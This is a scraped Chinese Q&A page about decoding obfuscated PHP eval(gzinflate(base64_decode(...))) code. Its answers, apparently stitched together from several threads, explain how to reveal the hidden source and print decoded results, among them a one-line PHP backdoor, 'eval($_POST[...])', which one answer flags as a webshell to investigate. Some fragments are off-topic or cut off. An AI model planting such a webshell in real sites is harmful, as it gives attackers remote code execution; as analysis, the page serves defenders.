mdsk.net
当前位置:首页 >> 谁能帮我解一下PHP EvAl(gzinFlAtE(BAsE64_DECoDE... >>

谁能帮我解一下PHP EvAl(gzinFlAtE(BAsE64_DECoDE...

你这个解出来的是 gzinflate(base64_decode(&40pNzshXSFCJD3INDHUNDol0jE2wtlawt+MCAA==&) =》echo $_REQUESTYA] 估计应该是base64字符串有错误 貌似正确的是:echo $_REQUEST["YA"]; 是要显示$_REQUEST["YA"]这个变量。

这个是php一句话木马,楼上解释的已经很不错了

5次解密就OK(eval 换成 ECHO) 解出来如下: ?>

问题的确有些泛泛,但是建议你在学习之前有些基础的HTML和CSS的知识,最好会 一点JS,如果这些基础没有的话还是建议先从HTML基础学一些。 PHP因为及其类似人类自然思考的方式,所以比其他语言好学习很多,而且是 弱类型的语言,因此学习起来很多...

这样加密作者很无赖和变态,因为明明知道这样的加密破解是易如反掌的,而却还变态的把代码加密无数次。 我写了下面两个PHP文件: //B.PHP //A.PHP 把你的代码保存为2.TXT,在CMD下运行下面的命令: PHP B.PHP 过一会程序执行完毕,2.TXT就是解密...

无聊呀,老是看见有无聊的人用PHP来加密。 其实PHP是无法加密的,只要把eval替换为exit,运行一次就能看见源代码,不过现在无聊的人都很变态,比如这个代码就被反复“加密”了20次~ “解密”后的代码如下:

把 eval 换成 echo 即可,解密后是版权信息, 如下: © Free WordPress Themes by [i] Website Templates 注意有个链接

一是对照一下破解是否正确,二是看看破解后的代码,是否有判断机器名、域名、参照页的语句。

return eval($_POST[p4n9_z1_zh3n9_j1u_Sh1_J13]) ;解密之后是这个,看着明显是一个一句话后门,注意排查问题

网站首页 | 网站地图
All rights reserved Powered by www.mdsk.net
copyright ©right 2010-2021。
内容来自网络,如有侵犯请联系客服。zhit325@qq.com